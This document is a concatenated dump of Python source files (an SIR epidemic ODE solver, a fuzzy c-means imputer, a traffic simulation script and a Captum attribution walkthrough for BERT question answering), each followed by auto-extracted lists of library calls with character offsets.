[((273, 306), 'numpy.empty', 'np.empty', (['(row * col, total_face)'], {}), '((row * col, total_face))\n', (281, 306), True, 'import numpy as np\n'), ((803, 836), 'numpy.empty', 'np.empty', (['(row * col, total_face)'], {}), '((row * col, total_face))\n', (811, 836), True, 'import numpy as np\n'), ((1048, 1067), 'numpy.linalg.eigh', 'np.linalg.eigh', (['cov'], {}), '(cov)\n', (1062, 1067), True, 'import numpy as np\n'), ((1139, 1164), 'numpy.argsort', 'np.argsort', (['(-eigen_values)'], {}), '(-eigen_values)\n', (1149, 1164), True, 'import numpy as np\n'), ((751, 775), 'numpy.sum', 'np.sum', (['img_list'], {'axis': '(1)'}), '(img_list, axis=1)\n', (757, 775), True, 'import numpy as np\n'), ((2875, 2901), 'numpy.matrix', 'np.matrix', (['eigen_vectors.T'], {}), '(eigen_vectors.T)\n', (2884, 2901), True, 'import numpy as np\n'), ((2902, 2917), 'numpy.matrix', 'np.matrix', (['diff'], {}), '(diff)\n', (2911, 2917), True, 'import numpy as np\n'), ((547, 570), 'cv2.cv2.imread', 'cv2.imread', (['img_path', '(0)'], {}), '(img_path, 0)\n', (557, 570), False, 'from cv2 import cv2\n'), ((972, 984), 'numpy.mat', 'np.mat', (['diff'], {}), '(diff)\n', (978, 984), True, 'import numpy as np\n'), ((985, 999), 'numpy.mat', 'np.mat', (['diff.T'], {}), '(diff.T)\n', (991, 999), True, 'import numpy as np\n'), ((596, 609), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (604, 609), True, 'import numpy as np\n')]
|
import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import odeint
T = 200
h = 1e-2
t = np.arange(start=0, stop=T + h, step=h)
bet, gam = 0.15, 1 / 50
# todo: change this to a random value later
# S_pocz = np.random.uniform(0.7, 1)
S_start = 0.8
I_start = 1 - S_start
R_start = 0
N = S_start + I_start + R_start # is const
# using odeint
# ---------------------------------------------------------------------------------------------------------------------#
def two_diff_ode_equation(state, t, bet, gam):
S, I = state
return [- bet * I * S / N, bet * I * S / N - gam * I]
def one_diff_equation_ode(state, t, bet, gam):
S = state[0]
C = I_start - gam / bet * np.log(S_start) + S_start # C - const
return [(-bet / N * S * (gam / bet * np.log(S) - S + C))]
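# Derivation note (added): dividing dI/dt by dS/dt in the SIR system gives
# dI/dS = -1 + gam*N/(bet*S), so I(S) = gam/bet*N*log(S) - S + C. With N = 1 here,
# C = I_start - gam/bet*log(S_start) + S_start, the constant used above, and substituting
# I(S) back into dS/dt = -bet*I*S/N yields the single ODE for S.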
def calc_R(S_arr, I_arr):
R_arr = np.zeros(len(t))
for i in range(len(R_arr)):
R_arr[i] = N - S_arr[i] - I_arr[i]
return R_arr
def calc_I(S_arr):
C = I_start - gam / bet * np.log(S_start) + S_start # C - const
I_arr = np.zeros(len(t))
for i in range(len(I_arr)):
I_arr[i] = gam / bet * np.log(S_arr[i]) - S_arr[i] + C
return I_arr
def two_equation_ode_plot(t, sym, labelt='$t$', labels=['S', 'I', 'R']):
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(10, 4))
# plot drawing (S, I)
for i in range(len(labels) - 1):
ax.plot(t, sym[:, i], label=labels[i])
# plot drawing (R)
ax.plot(t, calc_R(sym[:, 0], sym[:, 1]), label=labels[2])
ax.set_xlabel(labelt, fontsize=14)
    ax.set_ylabel('state', fontsize=14)
ax.set_ylim([0, 1])
ax.legend()
plt.show()
def one_equation_ode_plot(t, sym, labelt='$t$', labels=['S', 'I', 'R']):
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(10, 4))
# plot drawing (S)
ax.plot(t, sym[:, 0], label=labels[0])
# plot drawing (I)
I_arr = calc_I(sym[:, 0])
    ax.plot(t, I_arr, label=labels[1])
# plot drawing (R)
ax.plot(t, calc_R(sym[:, 0], I_arr), label=labels[2])
ax.set_xlabel(labelt, fontsize=14)
    ax.set_ylabel('state', fontsize=14)
ax.set_ylim([0, 1])
ax.legend()
plt.show()
def two_equation_ode_main():
start_state = S_start, I_start
sym = odeint(two_diff_ode_equation, start_state, t, args=(bet, gam))
two_equation_ode_plot(t, sym, labels=['S', 'I', 'R'])
def one_equation_ode_main():
start_state = S_start
sym = odeint(one_diff_equation_ode, start_state, t, args=(bet, gam))
one_equation_ode_plot(t, sym, labels=['S', 'I', 'R'])
# using manual
# ---------------------------------------------------------------------------------------------------------------------#
S = np.zeros(len(t))
S[0] = S_start
I = np.zeros(len(t))
I[0] = I_start
R = np.zeros(len(t))
R[0] = R_start
def two_diff_equation_manual():
for i in range(t.size - 1):
S[i + 1] = S[i] + h * (- bet * I[i] * S[i] / N)
I[i + 1] = I[i] + h * (bet * I[i] * S[i + 1] / N - gam * I[i])
R[i + 1] = N - S[i + 1] - I[i + 1]
def one_diff_equation_manual():
C = I_start - gam / bet * np.log(S_start) + S_start # C - const
for i in range(t.size - 1):
S[i + 1] = S[i] + h * (-bet / N * S[i] * (gam / bet * np.log(S[i]) - S[i] + C))
I[i + 1] = gam / bet * np.log(S[i + 1]) - S[i + 1] + C
R[i + 1] = N - S[i + 1] - I[i + 1]
def equation_man_plot(t, sirList, labelt='$t$', labels=['S', 'I', 'R']):
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(10, 4))
# plot drawing (R, S, I)
for i in range(len(sirList)):
ax.plot(t, sirList[i], label=labels[i])
ax.set_xlabel(labelt, fontsize=14)
    ax.set_ylabel('state', fontsize=14)
ax.set_ylim([0, 1])
ax.legend()
plt.show()
def two_equation_man_main():
two_diff_equation_manual()
equation_man_plot(t, [S, I, R], labels=['S', 'I', 'R'])
def one_equation_man_main():
one_diff_equation_manual()
equation_man_plot(t, [S, I, R], labels=['S', 'I', 'R'])
if __name__ == "__main__":
# one_equation_ode_main()
# one_equation_man_main()
# two_equation_ode_main()
two_equation_man_main()
exit(0)
|
[
"scipy.integrate.odeint",
"numpy.log",
"matplotlib.pyplot.subplots",
"numpy.arange",
"matplotlib.pyplot.show"
] |
[((108, 146), 'numpy.arange', 'np.arange', ([], {'start': '(0)', 'stop': '(T + h)', 'step': 'h'}), '(start=0, stop=T + h, step=h)\n', (117, 146), True, 'import numpy as np\n'), ((1261, 1308), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(1)', 'ncols': '(1)', 'figsize': '(10, 4)'}), '(nrows=1, ncols=1, figsize=(10, 4))\n', (1273, 1308), True, 'import matplotlib.pyplot as plt\n'), ((1628, 1638), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1636, 1638), True, 'import matplotlib.pyplot as plt\n'), ((1728, 1775), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(1)', 'ncols': '(1)', 'figsize': '(10, 4)'}), '(nrows=1, ncols=1, figsize=(10, 4))\n', (1740, 1775), True, 'import matplotlib.pyplot as plt\n'), ((2139, 2149), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2147, 2149), True, 'import matplotlib.pyplot as plt\n'), ((2226, 2288), 'scipy.integrate.odeint', 'odeint', (['two_diff_ode_equation', 'start_state', 't'], {'args': '(bet, gam)'}), '(two_diff_ode_equation, start_state, t, args=(bet, gam))\n', (2232, 2288), False, 'from scipy.integrate import odeint\n'), ((2414, 2476), 'scipy.integrate.odeint', 'odeint', (['one_diff_equation_ode', 'start_state', 't'], {'args': '(bet, gam)'}), '(one_diff_equation_ode, start_state, t, args=(bet, gam))\n', (2420, 2476), False, 'from scipy.integrate import odeint\n'), ((3435, 3482), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(1)', 'ncols': '(1)', 'figsize': '(10, 4)'}), '(nrows=1, ncols=1, figsize=(10, 4))\n', (3447, 3482), True, 'import matplotlib.pyplot as plt\n'), ((3716, 3726), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3724, 3726), True, 'import matplotlib.pyplot as plt\n'), ((691, 706), 'numpy.log', 'np.log', (['S_start'], {}), '(S_start)\n', (697, 706), True, 'import numpy as np\n'), ((992, 1007), 'numpy.log', 'np.log', (['S_start'], {}), '(S_start)\n', (998, 1007), True, 'import numpy as np\n'), ((3081, 3096), 'numpy.log', 'np.log', (['S_start'], {}), '(S_start)\n', (3087, 3096), True, 'import numpy as np\n'), ((1123, 1139), 'numpy.log', 'np.log', (['S_arr[i]'], {}), '(S_arr[i])\n', (1129, 1139), True, 'import numpy as np\n'), ((3271, 3287), 'numpy.log', 'np.log', (['S[i + 1]'], {}), '(S[i + 1])\n', (3277, 3287), True, 'import numpy as np\n'), ((771, 780), 'numpy.log', 'np.log', (['S'], {}), '(S)\n', (777, 780), True, 'import numpy as np\n'), ((3214, 3226), 'numpy.log', 'np.log', (['S[i]'], {}), '(S[i])\n', (3220, 3226), True, 'import numpy as np\n')]
|
import numpy as np
from skfuzzy import cmeans
from config import NAN, FCMParam
class FCMeansEstimator:
def __init__(self, c, m, data):
self.c = c
self.m = m
self.data = data
self.complete_rows, self.incomplete_rows = self.__extract_rows()
# Extract complete and incomplete rows
def __extract_rows(self):
rows, columns = len(self.data), len(self.data[0])
complete_rows, incomplete_rows = [], []
        for i in range(rows):
            for j in range(columns):
                if self.data[i][j] == NAN:
                    incomplete_rows.append(i)
                    break
            else:
                # only rows without any missing value are treated as complete
                complete_rows.append(i)
return np.array(complete_rows), np.array(incomplete_rows)
# Estimate the missing values
def estimate_missing_values(self):
estimated_data = []
complete_data = np.array([self.data[x] for x in self.complete_rows])
centers, _, _, _, _, _, _ = cmeans(data=complete_data.transpose(), c=self.c, m=self.m, error=FCMParam.ERROR,
maxiter=FCMParam.MAX_ITR, init=None)
# Calculate distance between two points based on euclidean distance
def calculate_distance(data_1, data_2):
return np.linalg.norm(data_1 - data_2)
# Calculate the membership value for given point
def calculate_membership(dist_matrix, distance, m):
numerator = np.power(distance, -2 / (1 - m))
denominator = np.array([np.power(x, -2 / (1 - m)) for x in dist_matrix]).sum()
return numerator / denominator
for i in self.incomplete_rows:
estimated = 0
dist, membership_value = [], []
miss_ind = np.where(self.data[i] == NAN)[0][0]
for center in centers:
dist.append(calculate_distance(data_1=np.delete(np.array(center), miss_ind),
data_2=np.delete(np.array(self.data[i]), miss_ind)))
for d in dist:
membership_value.append(calculate_membership(dist, d, self.m))
for k in range(self.c):
estimated += centers[k][miss_ind] * membership_value[k]
estimated_data.append(estimated)
return np.array(estimated_data)
|
[
"numpy.where",
"numpy.array",
"numpy.power",
"numpy.linalg.norm"
] |
[((873, 925), 'numpy.array', 'np.array', (['[self.data[x] for x in self.complete_rows]'], {}), '([self.data[x] for x in self.complete_rows])\n', (881, 925), True, 'import numpy as np\n'), ((2284, 2308), 'numpy.array', 'np.array', (['estimated_data'], {}), '(estimated_data)\n', (2292, 2308), True, 'import numpy as np\n'), ((696, 719), 'numpy.array', 'np.array', (['complete_rows'], {}), '(complete_rows)\n', (704, 719), True, 'import numpy as np\n'), ((721, 746), 'numpy.array', 'np.array', (['incomplete_rows'], {}), '(incomplete_rows)\n', (729, 746), True, 'import numpy as np\n'), ((1267, 1298), 'numpy.linalg.norm', 'np.linalg.norm', (['(data_1 - data_2)'], {}), '(data_1 - data_2)\n', (1281, 1298), True, 'import numpy as np\n'), ((1441, 1473), 'numpy.power', 'np.power', (['distance', '(-2 / (1 - m))'], {}), '(distance, -2 / (1 - m))\n', (1449, 1473), True, 'import numpy as np\n'), ((1741, 1770), 'numpy.where', 'np.where', (['(self.data[i] == NAN)'], {}), '(self.data[i] == NAN)\n', (1749, 1770), True, 'import numpy as np\n'), ((1510, 1535), 'numpy.power', 'np.power', (['x', '(-2 / (1 - m))'], {}), '(x, -2 / (1 - m))\n', (1518, 1535), True, 'import numpy as np\n'), ((1877, 1893), 'numpy.array', 'np.array', (['center'], {}), '(center)\n', (1885, 1893), True, 'import numpy as np\n'), ((1970, 1992), 'numpy.array', 'np.array', (['self.data[i]'], {}), '(self.data[i])\n', (1978, 1992), True, 'import numpy as np\n')]
|
import sim
import utils
import numpy as np
import matplotlib.pyplot as plt
import argparse
def main():
my_parser = argparse.ArgumentParser(description='Parameters for Simulation')
my_parser.add_argument('-N', '--n_cars', type=int, action='store', help='Number of cars', default = 40)
my_parser.add_argument('-L', '--length', type=int, action='store', help='Length of road', default = 250)
my_parser.add_argument('-P', '--p_break', type=float, action='store', help='probability of stopping', default = 0.1)
my_parser.add_argument('-S', '--steps', type=int, action='store', help='Steps of simulation', required = True)
args = my_parser.parse_args()
print(dir(args))
N=args.n_cars
L=args.length
pos = np.zeros(N)
vel = np.zeros(N)
sim.populate_arrays(pos,vel,N)
pos_list = sim.run_simulation(pos,vel,N,L, MAX_STEPS=args.steps, p = args.p_break)
flow = utils.estimate_flow(pos_list,N, 0,250)
sim_fig = utils.plot_simulation(pos_list)
plt.show()
if __name__ == '__main__':
main()
|
[
"sim.populate_arrays",
"utils.plot_simulation",
"argparse.ArgumentParser",
"utils.estimate_flow",
"sim.run_simulation",
"numpy.zeros",
"matplotlib.pyplot.show"
] |
[((122, 186), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Parameters for Simulation"""'}), "(description='Parameters for Simulation')\n", (145, 186), False, 'import argparse\n'), ((744, 755), 'numpy.zeros', 'np.zeros', (['N'], {}), '(N)\n', (752, 755), True, 'import numpy as np\n'), ((766, 777), 'numpy.zeros', 'np.zeros', (['N'], {}), '(N)\n', (774, 777), True, 'import numpy as np\n'), ((783, 815), 'sim.populate_arrays', 'sim.populate_arrays', (['pos', 'vel', 'N'], {}), '(pos, vel, N)\n', (802, 815), False, 'import sim\n'), ((829, 901), 'sim.run_simulation', 'sim.run_simulation', (['pos', 'vel', 'N', 'L'], {'MAX_STEPS': 'args.steps', 'p': 'args.p_break'}), '(pos, vel, N, L, MAX_STEPS=args.steps, p=args.p_break)\n', (847, 901), False, 'import sim\n'), ((912, 952), 'utils.estimate_flow', 'utils.estimate_flow', (['pos_list', 'N', '(0)', '(250)'], {}), '(pos_list, N, 0, 250)\n', (931, 952), False, 'import utils\n'), ((965, 996), 'utils.plot_simulation', 'utils.plot_simulation', (['pos_list'], {}), '(pos_list)\n', (986, 996), False, 'import utils\n'), ((1001, 1011), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1009, 1011), True, 'import matplotlib.pyplot as plt\n')]
|
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
from transformers import BertTokenizer, BertForQuestionAnswering, BertConfig
from captum.attr import visualization as viz
from captum.attr import LayerConductance, LayerIntegratedGradients
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
model_path = "<PATH-TO-SAVED-MODEL>"
model = BertForQuestionAnswering.from_pretrained(model_path)
model.to(device)
model.eval()
model.zero_grad()
tokenizer = BertTokenizer.from_pretrained(model_path)
def predict(inputs, token_type_ids=None, position_ids=None, attention_mask=None):
output = model(
inputs,
token_type_ids=token_type_ids,
position_ids=position_ids,
attention_mask=attention_mask,
)
return output.start_logits, output.end_logits
def squad_pos_forward_func(inputs, token_type_ids=None, position_ids=None, attention_mask=None, position=0):
pred = predict(inputs, token_type_ids=token_type_ids, position_ids=position_ids, attention_mask=attention_mask)
pred = pred[position]
return pred.max(1).values
ref_token_id = tokenizer.pad_token_id
sep_token_id = tokenizer.sep_token_id
cls_token_id = tokenizer.cls_token_id
def construct_input_ref_pair(question, text, ref_token_id, sep_token_id, cls_token_id):
question_ids = tokenizer.encode(question, add_special_tokens=False)
text_ids = tokenizer.encode(text, add_special_tokens=False)
input_ids = [cls_token_id] + question_ids + [sep_token_id] + text_ids + [sep_token_id]
ref_input_ids = (
[cls_token_id]
+ [ref_token_id] * len(question_ids)
+ [sep_token_id]
+ [ref_token_id] * len(text_ids)
+ [sep_token_id]
)
return torch.tensor([input_ids], device=device), torch.tensor([ref_input_ids], device=device), len(question_ids)
def construct_input_ref_token_type_pair(input_ids, sep_ind=0):
seq_len = input_ids.size(1)
token_type_ids = torch.tensor([[0 if i <= sep_ind else 1 for i in range(seq_len)]], device=device)
ref_token_type_ids = torch.zeros_like(token_type_ids, device=device)
return token_type_ids, ref_token_type_ids
def construct_input_ref_pos_id_pair(input_ids):
seq_length = input_ids.size(1)
position_ids = torch.arange(seq_length, dtype=torch.long, device=device)
ref_position_ids = torch.zeros(seq_length, dtype=torch.long, device=device)
position_ids = position_ids.unsqueeze(0).expand_as(input_ids)
ref_position_ids = ref_position_ids.unsqueeze(0).expand_as(input_ids)
return position_ids, ref_position_ids
def construct_attention_mask(input_ids):
return torch.ones_like(input_ids)
def construct_whole_bert_embeddings(
input_ids, ref_input_ids, token_type_ids=None, ref_token_type_ids=None, position_ids=None, ref_position_ids=None
):
input_embeddings = model.bert.embeddings(input_ids, token_type_ids=token_type_ids, position_ids=position_ids)
ref_input_embeddings = model.bert.embeddings(
ref_input_ids, token_type_ids=ref_token_type_ids, position_ids=ref_position_ids
)
return input_embeddings, ref_input_embeddings
question, text = (
"What is important to us?",
"It is important to us to include, empower and support humans of all kinds.",
)
input_ids, ref_input_ids, sep_id = construct_input_ref_pair(question, text, ref_token_id, sep_token_id, cls_token_id)
token_type_ids, ref_token_type_ids = construct_input_ref_token_type_pair(input_ids, sep_id)
position_ids, ref_position_ids = construct_input_ref_pos_id_pair(input_ids)
attention_mask = construct_attention_mask(input_ids)
indices = input_ids[0].detach().tolist()
all_tokens = tokenizer.convert_ids_to_tokens(indices)
ground_truth = "to include, empower and support humans of all kinds"
ground_truth_tokens = tokenizer.encode(ground_truth, add_special_tokens=False)
ground_truth_end_ind = indices.index(ground_truth_tokens[-1])
ground_truth_start_ind = ground_truth_end_ind - len(ground_truth_tokens) + 1
start_scores, end_scores = predict(
input_ids, token_type_ids=token_type_ids, position_ids=position_ids, attention_mask=attention_mask
)
print("Question: ", question)
print("Predicted Answer: ", " ".join(all_tokens[torch.argmax(start_scores) : torch.argmax(end_scores) + 1]))
lig = LayerIntegratedGradients(squad_pos_forward_func, model.bert.embeddings)
attributions_start, delta_start = lig.attribute(
inputs=input_ids,
baselines=ref_input_ids,
additional_forward_args=(token_type_ids, position_ids, attention_mask, 0),
return_convergence_delta=True,
)
attributions_end, delta_end = lig.attribute(
inputs=input_ids,
baselines=ref_input_ids,
additional_forward_args=(token_type_ids, position_ids, attention_mask, 1),
return_convergence_delta=True,
)
def summarize_attributions(attributions):
attributions = attributions.sum(dim=-1).squeeze(0)
attributions = attributions / torch.norm(attributions)
return attributions
attributions_start_sum = summarize_attributions(attributions_start)
attributions_end_sum = summarize_attributions(attributions_end)
start_position_vis = viz.VisualizationDataRecord(
attributions_start_sum,
torch.max(torch.softmax(start_scores[0], dim=0)),
torch.argmax(start_scores),
torch.argmax(start_scores),
str(ground_truth_start_ind),
attributions_start_sum.sum(),
all_tokens,
delta_start,
)
end_position_vis = viz.VisualizationDataRecord(
attributions_end_sum,
torch.max(torch.softmax(end_scores[0], dim=0)),
torch.argmax(end_scores),
torch.argmax(end_scores),
str(ground_truth_end_ind),
attributions_end_sum.sum(),
all_tokens,
delta_end,
)
print("\033[1m", "Visualizations For Start Position", "\033[0m")
viz.visualize_text([start_position_vis])
print("\033[1m", "Visualizations For End Position", "\033[0m")
viz.visualize_text([end_position_vis])
from IPython.display import Image
Image(filename="img/bert/visuals_of_start_end_predictions.png")
lig2 = LayerIntegratedGradients(
squad_pos_forward_func,
[
model.bert.embeddings.word_embeddings,
model.bert.embeddings.token_type_embeddings,
model.bert.embeddings.position_embeddings,
],
)
attributions_start = lig2.attribute(
inputs=(input_ids, token_type_ids, position_ids),
baselines=(ref_input_ids, ref_token_type_ids, ref_position_ids),
additional_forward_args=(attention_mask, 0),
)
attributions_end = lig2.attribute(
inputs=(input_ids, token_type_ids, position_ids),
baselines=(ref_input_ids, ref_token_type_ids, ref_position_ids),
additional_forward_args=(attention_mask, 1),
)
attributions_start_word = summarize_attributions(attributions_start[0])
attributions_end_word = summarize_attributions(attributions_end[0])
attributions_start_token_type = summarize_attributions(attributions_start[1])
attributions_end_token_type = summarize_attributions(attributions_end[1])
attributions_start_position = summarize_attributions(attributions_start[2])
attributions_end_position = summarize_attributions(attributions_end[2])
def get_topk_attributed_tokens(attrs, k=5):
values, indices = torch.topk(attrs, k)
top_tokens = [all_tokens[idx] for idx in indices]
return top_tokens, values, indices
top_words_start, top_words_val_start, top_word_ind_start = get_topk_attributed_tokens(attributions_start_word)
top_words_end, top_words_val_end, top_words_ind_end = get_topk_attributed_tokens(attributions_end_word)
top_token_type_start, top_token_type_val_start, top_token_type_ind_start = get_topk_attributed_tokens(
attributions_start_token_type
)
top_token_type_end, top_token_type_val_end, top_token_type_ind_end = get_topk_attributed_tokens(
attributions_end_token_type
)
top_pos_start, top_pos_val_start, pos_ind_start = get_topk_attributed_tokens(attributions_start_position)
top_pos_end, top_pos_val_end, pos_ind_end = get_topk_attributed_tokens(attributions_end_position)
df_start = pd.DataFrame(
{
"Word(Index), Attribution": [
"{} ({}), {}".format(word, pos, round(val.item(), 2))
for word, pos, val in zip(top_words_start, top_word_ind_start, top_words_val_start)
],
"Token Type(Index), Attribution": [
"{} ({}), {}".format(ttype, pos, round(val.item(), 2))
for ttype, pos, val in zip(top_token_type_start, top_token_type_ind_start, top_words_val_start)
],
"Position(Index), Attribution": [
"{} ({}), {}".format(position, pos, round(val.item(), 2))
for position, pos, val in zip(top_pos_start, pos_ind_start, top_pos_val_start)
],
}
)
df_start.style.apply(["cell_ids: False"])
df_end = pd.DataFrame(
{
"Word(Index), Attribution": [
"{} ({}), {}".format(word, pos, round(val.item(), 2))
for word, pos, val in zip(top_words_end, top_words_ind_end, top_words_val_end)
],
"Token Type(Index), Attribution": [
"{} ({}), {}".format(ttype, pos, round(val.item(), 2))
for ttype, pos, val in zip(top_token_type_end, top_token_type_ind_end, top_words_val_end)
],
"Position(Index), Attribution": [
"{} ({}), {}".format(position, pos, round(val.item(), 2))
for position, pos, val in zip(top_pos_end, pos_ind_end, top_pos_val_end)
],
}
)
df_end.style.apply(["cell_ids: False"])
["{}({})".format(token, str(i)) for i, token in enumerate(all_tokens)]
df_start
df_end
def squad_pos_forward_func2(input_emb, attention_mask=None, position=0):
pred = model(
inputs_embeds=input_emb,
attention_mask=attention_mask,
)
pred = pred[position]
return pred.max(1).values
layer_attrs_start = []
layer_attrs_end = []
token_to_explain = 23
layer_attrs_start_dist = []
layer_attrs_end_dist = []
input_embeddings, ref_input_embeddings = construct_whole_bert_embeddings(
input_ids,
ref_input_ids,
token_type_ids=token_type_ids,
ref_token_type_ids=ref_token_type_ids,
position_ids=position_ids,
ref_position_ids=ref_position_ids,
)
for i in range(model.config.num_hidden_layers):
lc = LayerConductance(squad_pos_forward_func2, model.bert.encoder.layer[i])
layer_attributions_start = lc.attribute(
inputs=input_embeddings, baselines=ref_input_embeddings, additional_forward_args=(attention_mask, 0)
)
layer_attributions_end = lc.attribute(
inputs=input_embeddings, baselines=ref_input_embeddings, additional_forward_args=(attention_mask, 1)
)
layer_attrs_start.append(summarize_attributions(layer_attributions_start).cpu().detach().tolist())
layer_attrs_end.append(summarize_attributions(layer_attributions_end).cpu().detach().tolist())
layer_attrs_start_dist.append(layer_attributions_start[0, token_to_explain, :].cpu().detach().tolist())
layer_attrs_end_dist.append(layer_attributions_end[0, token_to_explain, :].cpu().detach().tolist())
fig, ax = plt.subplots(figsize=(15, 5))
xticklabels = all_tokens
yticklabels = list(range(1, 13))
ax = sns.heatmap(np.array(layer_attrs_start), xticklabels=xticklabels, yticklabels=yticklabels, linewidth=0.2)
plt.xlabel("Tokens")
plt.ylabel("Layers")
plt.show()
fig, ax = plt.subplots(figsize=(15, 5))
xticklabels = all_tokens
yticklabels = list(range(1, 13))
ax = sns.heatmap(np.array(layer_attrs_end), xticklabels=xticklabels, yticklabels=yticklabels, linewidth=0.2)
plt.xlabel("Tokens")
plt.ylabel("Layers")
plt.show()
fig, ax = plt.subplots(figsize=(20, 10))
ax = sns.boxplot(data=layer_attrs_start_dist)
plt.xlabel("Layers")
plt.ylabel("Attribution")
plt.show()
fig, ax = plt.subplots(figsize=(20, 10))
ax = sns.boxplot(data=layer_attrs_end_dist)
plt.xlabel("Layers")
plt.ylabel("Attribution")
plt.show()
def pdf_attr(attrs, bins=100):
return np.histogram(attrs, bins=bins, density=True)[0]
layer_attrs_end_pdf = map(lambda layer_attrs_end_dist: pdf_attr(layer_attrs_end_dist), layer_attrs_end_dist)
layer_attrs_end_pdf = np.array(list(layer_attrs_end_pdf))
attr_sum = np.array(layer_attrs_end_dist).sum(-1)
layer_attrs_end_pdf_norm = np.linalg.norm(layer_attrs_end_pdf, axis=-1, ord=1)
layer_attrs_end_pdf = np.transpose(layer_attrs_end_pdf)
layer_attrs_end_pdf = np.divide(layer_attrs_end_pdf, layer_attrs_end_pdf_norm, where=layer_attrs_end_pdf_norm != 0)
fig, ax = plt.subplots(figsize=(20, 10))
plt.plot(layer_attrs_end_pdf)
plt.xlabel("Bins")
plt.ylabel("Density")
plt.legend(["Layer " + str(i) for i in range(1, 13)])
plt.show()
fig, ax = plt.subplots(figsize=(20, 10))
layer_attrs_end_pdf[layer_attrs_end_pdf == 0] = 1
layer_attrs_end_pdf_log = np.log2(layer_attrs_end_pdf)
entropies = -(layer_attrs_end_pdf * layer_attrs_end_pdf_log).sum(0)
plt.scatter(np.arange(12), attr_sum, s=entropies * 100)
plt.xlabel("Layers")
plt.ylabel("Total Attribution")
plt.show()
|
[
"matplotlib.pyplot.ylabel",
"torch.softmax",
"numpy.array",
"torch.cuda.is_available",
"numpy.linalg.norm",
"torch.arange",
"numpy.divide",
"numpy.arange",
"numpy.histogram",
"captum.attr.LayerIntegratedGradients",
"matplotlib.pyplot.xlabel",
"IPython.display.Image",
"captum.attr.visualization.visualize_text",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.subplots",
"torch.zeros_like",
"torch.argmax",
"torch.ones_like",
"torch.topk",
"torch.norm",
"numpy.log2",
"numpy.transpose",
"matplotlib.pyplot.show",
"transformers.BertForQuestionAnswering.from_pretrained",
"transformers.BertTokenizer.from_pretrained",
"seaborn.boxplot",
"torch.tensor",
"captum.attr.LayerConductance",
"torch.zeros"
] |
[((440, 492), 'transformers.BertForQuestionAnswering.from_pretrained', 'BertForQuestionAnswering.from_pretrained', (['model_path'], {}), '(model_path)\n', (480, 492), False, 'from transformers import BertTokenizer, BertForQuestionAnswering, BertConfig\n'), ((554, 595), 'transformers.BertTokenizer.from_pretrained', 'BertTokenizer.from_pretrained', (['model_path'], {}), '(model_path)\n', (583, 595), False, 'from transformers import BertTokenizer, BertForQuestionAnswering, BertConfig\n'), ((4349, 4420), 'captum.attr.LayerIntegratedGradients', 'LayerIntegratedGradients', (['squad_pos_forward_func', 'model.bert.embeddings'], {}), '(squad_pos_forward_func, model.bert.embeddings)\n', (4373, 4420), False, 'from captum.attr import LayerConductance, LayerIntegratedGradients\n'), ((5814, 5854), 'captum.attr.visualization.visualize_text', 'viz.visualize_text', (['[start_position_vis]'], {}), '([start_position_vis])\n', (5832, 5854), True, 'from captum.attr import visualization as viz\n'), ((5919, 5957), 'captum.attr.visualization.visualize_text', 'viz.visualize_text', (['[end_position_vis]'], {}), '([end_position_vis])\n', (5937, 5957), True, 'from captum.attr import visualization as viz\n'), ((5994, 6057), 'IPython.display.Image', 'Image', ([], {'filename': '"""img/bert/visuals_of_start_end_predictions.png"""'}), "(filename='img/bert/visuals_of_start_end_predictions.png')\n", (5999, 6057), False, 'from IPython.display import Image\n'), ((6066, 6253), 'captum.attr.LayerIntegratedGradients', 'LayerIntegratedGradients', (['squad_pos_forward_func', '[model.bert.embeddings.word_embeddings, model.bert.embeddings.\n token_type_embeddings, model.bert.embeddings.position_embeddings]'], {}), '(squad_pos_forward_func, [model.bert.embeddings.\n word_embeddings, model.bert.embeddings.token_type_embeddings, model.\n bert.embeddings.position_embeddings])\n', (6090, 6253), False, 'from captum.attr import LayerConductance, LayerIntegratedGradients\n'), ((11048, 11077), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(15, 5)'}), '(figsize=(15, 5))\n', (11060, 11077), True, 'import matplotlib.pyplot as plt\n'), ((11247, 11267), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Tokens"""'], {}), "('Tokens')\n", (11257, 11267), True, 'import matplotlib.pyplot as plt\n'), ((11268, 11288), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Layers"""'], {}), "('Layers')\n", (11278, 11288), True, 'import matplotlib.pyplot as plt\n'), ((11289, 11299), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11297, 11299), True, 'import matplotlib.pyplot as plt\n'), ((11311, 11340), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(15, 5)'}), '(figsize=(15, 5))\n', (11323, 11340), True, 'import matplotlib.pyplot as plt\n'), ((11508, 11528), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Tokens"""'], {}), "('Tokens')\n", (11518, 11528), True, 'import matplotlib.pyplot as plt\n'), ((11529, 11549), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Layers"""'], {}), "('Layers')\n", (11539, 11549), True, 'import matplotlib.pyplot as plt\n'), ((11550, 11560), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11558, 11560), True, 'import matplotlib.pyplot as plt\n'), ((11572, 11602), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (11584, 11602), True, 'import matplotlib.pyplot as plt\n'), ((11608, 11648), 'seaborn.boxplot', 'sns.boxplot', ([], {'data': 'layer_attrs_start_dist'}), '(data=layer_attrs_start_dist)\n', (11619, 11648), True, 'import 
